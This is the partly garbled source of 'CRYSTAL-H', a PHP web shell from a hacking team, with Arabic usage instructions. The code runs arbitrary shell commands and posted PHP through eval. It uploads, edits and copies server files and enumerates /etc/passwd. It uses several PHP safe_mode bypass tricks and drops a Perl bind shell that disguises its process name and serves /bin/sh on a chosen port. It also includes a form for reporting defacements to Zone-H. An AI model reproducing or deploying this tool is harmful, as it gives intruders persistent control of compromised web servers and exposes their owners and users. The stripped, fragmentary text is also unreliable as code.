ِCRYSTAL-H Crystal hack shellphp 2006-2007

ON (secure)"; } else {$safemode = false; $hsafemode = "OFF (not secure)";} echo("Safe-mode: $hsafemode"); // PHPINFO if ($_GET['action'] == "phpinfo") { echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm"; exit; } $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} echo("
"); echo("Open base dir: $hopenbasedir"); echo("
"); echo "PostgreSQL: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ON";}else{echo "OFF
";} echo("
"); echo "MSSQL: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ON";}else{echo "OFF";} echo("
"); echo "MySQL: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "ON"; } else { echo "OFF"; } echo("
"); echo "PHP version: ".@phpversion().""; echo("
"); echo "cURL: ".(($curl_on)?("ON"):("OFF")); echo("
"); echo "Disable functions : "; if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); ?>

 

 

 

OS:  

Server:  

User:
1:

    Back ً phpinfo2  Tools4   Decoderi   ByPass`   SQLآ  Bindآ help sabout ?

[j server : CGI v:           HTTP v:  Mail admin:          
:  IP  SERVER:                           port :

السلام عليكم ورحمة الله وبركاته

عزيزي المستخدم
اذا اردت المساعدة اضغط على اسم الخيار الموضح باللون الازرق
وستظهر لك معلومات الخيار .
";} if ($act == "bindport"){ echo "
/bin/bash Port
"; } if ($act == "tools"){ echo "
File to edit:
"; echo "
"; echo "
Download here from: -->>:
"; } if ($act == "about") {echo "
Coding by:

Super-Crystal
&
Mohajer22
-----
Thanks
TrYaG Team
ArabSecurityCenter Team
CRYSTAL-H Version:0 Beta phpshell code
Saudi Arabic .
";} if ($act == "bind") {echo "
CRYSTAL-H:

-Connect قم بالضغط على خيار.
.- بعد مايتم انزال السكريبت بالمجلد
.-توجه لاداة النت كات وتصنت على
nc -lp 3333بكتابة المنفذ -
السكريبت بلغة البيرل
Bind port to :
bind shell وهنيئا ً لك .
";} if ($act == "command") {echo "
CRYSTAL-H:

لأختيار الاوامر الجاهزه Select ------ x اضغط على الخيار
.- واذا اردت كتابه الاوامر بنفسك قد تكتفي بالخيار
Command .
";} if ($act == "team") {echo "
Arab Security Center Team

Super-Crystal
Medo-HaCKer
Anaconda
Alsb0r
ReeM-HaCK
NoOFa
AL-Alame
The YounG HackeR
Anti-Hack
Thanks .
";} if (array_key_exists('image', $_GET)) { header('Content-Type: image/gif'); die(getimage($_GET['image'])); } if ($act == "bypass") { echo "
Execute:
"; echo (" bypass safemode with copy "); echo "
read file :
"; echo (" bypass safemode with CuRl"); echo "
read file :
"; echo (" bypass safemode with imap()"); echo "
"; echo (" bypass safemode with id()"); echo "
"; echo (" Exploit: error_log()"); echo "
"; } if ($act == "decoder"){ echo (" replace Chr()"); echo "

"; } if ($act == "SQL"){ echo (" MySQL "); echo "
Username : \n password : \n \n
"; } ?>

 

 
Exploit: error_log() By * Super-Crystal *
By * Super-Crystal * TrYaG Team
", 3,$ERORR); } // id // if ($_POST['plugin'] ){ switch($_POST['plugin']){ case("cat /etc/passwd"): for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "
"; } } break; } } // imap // $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { $stream = imap_open($string, "", ""); $str = imap_body($stream, 1); if (!empty($str)) echo "
".$str."
"; imap_close($stream); } elseif ($string && $switch == "dir") { $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo "
";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]"."

 

" ; echo "
"; imap_close($stream); } // CURL // if(empty($_POST['curl'])){ } else { $m=$_POST['curl']; $ch = curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); curl_exec($ch); var_dump(curl_exec($ch)); } // copy// $u1p=""; $tymczas=""; if(empty($_POST['copy'])){ } else { $u1p=$_POST['copy']; $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$u1p, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "".htmlspecialchars($tekst).""; unlink($temp); } else { die("
Sorry... File ".htmlspecialchars($u1p)." dosen't exists or you don't have access.
"); } } @$dir = $_POST['dir']; $dir = stripslashes($dir); @$cmd = $_POST['cmd']; $cmd = stripslashes($cmd); $REQUEST_URI = $_SERVER['REQUEST_URI']; $dires = ''; $files = ''; if (isset($_POST['port'])){ $bind = " #!/usr/bin/perl \$port = {$_POST['port']}; \$port = \$ARGV[0] if \$ARGV[0]; exit if fork; $0 = \"updatedb\" . \" \" x100; \$SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in(\$port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, \"<&X\"; open STDOUT, \">&X\"; open STDERR, \">&X\"; close X; exec(\"/bin/sh\"); } close X; } ";} function decode($buffer){ return convert_cyr_string ($buffer, 'd', 'w'); } function execute($com) { if (!empty($com)) { if(function_exists('exec')) { exec($com,$arr); echo implode(' ',$arr); } elseif(function_exists('shell_exec')) { echo shell_exec($com); } elseif(function_exists('system')) { echo system($com); } elseif(function_exists('passthru')) { echo passthru($com); } } } function perms($mode) { if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") { copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]); } if((isset($_POST['fileto']))||(isset($_POST['filefrom']))) { $data = implode("", file($_POST['filefrom'])); $fp = fopen($_POST['fileto'], "wb"); fputs($fp, $data); $ok = fclose($fp); if($ok) { $size = filesize($_POST['fileto'])/1024; $sizef = sprintf("%.2f", $size); print "
Download - OK. (".$sizef."??)
"; } else { print "
Something is wrong. Download - IS NOT OK
"; } } if (isset($_POST['installbind'])){ if (is_dir($_POST['installpath']) == true){ chdir($_POST['installpath']); $_POST['installpath'] = "temp.pl";} $fp = fopen($_POST['installpath'], "w"); fwrite($fp, $bind); fclose($fp); exec("perl " . $_POST['installpath']); chdir($dir); } @$ef = stripslashes($_POST['editfile']); if ($ef){ $fp = fopen($ef, "r"); $filearr = file($ef); $string = ''; $content = ''; foreach ($filearr as $string){ $string = str_replace("<" , "<" , $string); $string = str_replace(">" , ">" , $string); $content = $content . $string; } echo "
Edit file: $ef

"; fclose($fp); } if(isset($_POST['savefile'])){ $fp = fopen($_POST['savefile'], "w"); $content = stripslashes($content); fwrite($fp, $content); fclose($fp); echo "
saved -OK!
"; } if (isset($_POST['php'])){ echo "
eval code

"; } if(isset($_POST['phpcode'])){ echo "
Results of PHP execution

"; @eval(stripslashes($_POST['phpcode'])); echo "
"; } if ($cmd){ if($sertype == "winda"){ ob_start(); execute($cmd); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } else{ ob_start(); echo decode(execute($cmd)); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } if (trim($buffer)){ echo "
Command: $cmd
"; } } $arr = array(); $arr = array_merge($arr, glob("*")); $arr = array_merge($arr, glob(".*")); $arr = array_merge($arr, glob("*.*")); $arr = array_unique($arr); sort($arr); echo ""; foreach ($arr as $filename) { if ($filename != "." and $filename != ".."){ if (is_dir($filename) == true){ $directory = ""; $directory = $directory . "";} else{ $directory = $directory . ""; } if (is_readable($filename) == true){ $directory = $directory . "";} else{ $directory = $directory . ""; } $dires = $dires . $directory; } if (is_file($filename) == true){ $file = ""; $file = $file . "";} else{ $file = $file . ""; } if (is_readable($filename) == true){ $file = $file . "";} else{ $file = $file . ""; } $files = $files . $file; } } } echo $dires; echo $files; echo "
NameTypeSizeLast accessLast changePermsWriteRead
$filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); if (is_writable($filename) == true){ $directory = $directory . "YesNoYesNo
$filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); if (is_writable($filename) == true){ $file = $file . "YesNoYes
No

"; echo "
Command: Directory:
"; if (ini_get('safe_mode') == 1){echo "
SAFE MOD IS ON
Including from here: " . ini_get('safe_mode_include_dir') . "
Exec here: " . ini_get('safe_mode_exec_dir'). "
";} ?>



< 


:: Executed command ::

Command:"; ?> f

 

Selectg 
Bind port toآ

::Edit/Create file::"

 التحرير والانشاء:

قم بوضع اسم الملف الذي تريد تحريره فقط
وبعد ذالك الضغط على config.php مثال
Edit
ستظهر لك نافذه بها محتويات الملف
وايضا ً اذا اردت انشاء ملف فقط ضع اسمه مع الامتداد
وبعد ذالك اكتب ماتريد washer-crystal.txt .
";} ?>

 

File to edit:

"; ?>

رفع الملفات:

قم بتحديد الملف المراد رفعه
وبعد ذالك قم بالضغط على الخيار الموضح
UPLOAD< .
";} ?>:: upload::Ņ

 
"; ?>

 Defacer Zone-H

 

CRYSTAL-H:

اسم المعلن Defacer
الموقع المخترق Victim
وضع الاختراق اي نوع الثغره التى استثمرتها Attack Mode
سبب الاختراق Attack Reason
لارسال الاختراق sand
لرؤيه اخر التحذيرات المرسله بالموقع Attacks On Hold.
";} ?>

Defacer Zone-h

 
::Defacer:::è
::Victim:::è
Attack Mode:è
Attack Reason:è
 
  :   L Attacks On Hold L


 yCrystal shell v. 1 beta  ©oded by TrYaG Team l Arab Security Center Team |securityCenter| : Web x

 

 
CRYSTAL-H 2006
PPSCPCC
1
2 3 4 5 6 7 8
9 10 11 12 1314 15
16 17 181920 21 22
23242526272829
3031